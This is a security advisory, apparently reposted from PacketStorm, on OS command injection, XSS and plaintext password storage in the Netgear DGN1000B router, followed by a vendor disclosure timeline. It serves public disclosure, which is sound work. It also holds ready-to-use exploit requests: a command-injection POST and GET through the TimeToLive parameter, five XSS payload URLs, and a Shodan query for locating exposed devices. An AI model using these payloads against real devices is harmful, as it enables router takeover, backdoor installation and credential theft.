Netgear DGN1000B XSS / Command Injection

[Praetorian503]

The Netgear N150 Wireless ADSL2+ Modem Router DGN1000 suffers from cross site scripting, OS command injection, and insecure cryptographic storage vulnerabilities. Firmware versions 1.1.00.24 and 1.1.00.45 are affected.

Device Name: DGN1000B
Vendor: Netgear

============ Vulnerable Firmware Releases: ============

Firmwareversion:    V1.1.00.24
Firmwareversion:    V1.1.00.45

Download: http://downloadcenter.netgear.com/de/product/DGN1000

============ Device Description: ============

The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.

Source: http://support.netgear.com/product/DGN1000

============ Shodan Torks ============

Shodan Search: NETGEAR DGN1000

============ Vulnerability Overview: ============

    * OS Command Injection in the UPNP configuration:

The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

Param: TimeToLive
POST /setup.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm
Authorization: Basic XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4

Change the Request Methode from HTTP Post to HTTP GET:

http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4


It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun 

Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649
direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png

    * Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:
cat /tmp/etc/htpasswd
admin:password

    * XSS

Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname

Param: service_name

http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm

-> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename

Param: device

http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm

Param: ssid_num

http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1

Param: h_skeyword

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=

Param: cfKeyWord_Domain

http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-005
Twitter: @s3cur1ty_de

============ Time Line: ============

October 2012 - discovered vulnerability
15.10.2012 - Privately reported all details to vendor via email
23.10.2012 - Privately reported all details to vendor via webinterface
24.10.2012 - Netgear replied to forward the details internally
31.10.2012 - Netgear closes the case
31.10.2012 - Requested more details why the case is now closed.
31.10.2012 - Netgear responded that they will check the state of the case
06.11.2012 - Netgear requested the Serial Number of the device
08.11.2012 - Responded with the Serial Number
13.11.2012 - something goes on - I got a product registration confirmation
03.12.2012 - Case closed by Netgear - No new firmware available
16.01.2013 - Netgear contacted me again requesting to check a Beta version
22.01.2013 - Tested Beta Firmware and gave feedback to vendor
06.02.2013 - public release

===================== Advisory end =====================

Source: PacketStorm